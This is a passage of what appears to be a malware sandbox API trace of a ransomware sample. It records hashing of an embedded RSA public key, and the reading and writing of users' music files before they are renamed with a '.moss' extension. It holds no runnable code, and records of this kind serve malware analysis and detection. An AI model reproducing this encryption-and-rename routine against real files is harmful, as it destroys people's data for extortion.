KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.424] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.424] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.425] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.425] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.425] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.425] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.425] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.425] GetLastError () returned 0x0 [0172.425] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.425] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.425] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.425] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.425] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.425] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.425] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.425] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.426] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.426] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.426] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\3KR652nYn_xiX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\3kr652nyn_xix.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\3KR652nYn_xiX.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\3kr652nyn_xix.wav.moss")) returned 1 [0172.428] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Pn3-5wISK.m4a") returned=".m4a" [0172.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Pn3-5wISK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\pn3-5wisk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.428] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=56873) returned 1 [0172.428] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.431] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xde03, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.431] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.432] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.432] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xde29, lpOverlapped=0x0) returned 1 [0172.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.433] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.433] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.434] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.434] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.434] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.434] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.434] GetLastError () returned 0x0 [0172.434] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.434] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.434] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.434] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.434] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.435] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.435] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xde29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.435] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.436] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Pn3-5wISK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\pn3-5wisk.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Pn3-5wISK.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\pn3-5wisk.m4a.moss")) returned 1 [0172.437] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Y_tiO3q43S_U97rK1p.m4a") returned=".m4a" [0172.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Y_tiO3q43S_U97rK1p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\y_tio3q43s_u97rk1p.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.437] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=26713) returned 1 [0172.437] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.440] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6833, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.440] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.441] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6859, lpOverlapped=0x0) returned 1 [0172.441] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.441] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.441] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.441] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.442] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.442] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.442] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.442] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.442] GetLastError () returned 0x0 [0172.442] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.442] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.442] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.442] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.443] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.443] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.443] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6859, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.443] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.443] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Y_tiO3q43S_U97rK1p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\y_tio3q43s_u97rk1p.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\Y_tiO3q43S_U97rK1p.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\y_tio3q43s_u97rk1p.m4a.moss")) returned 1 [0172.445] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.445] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46128 [0172.445] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 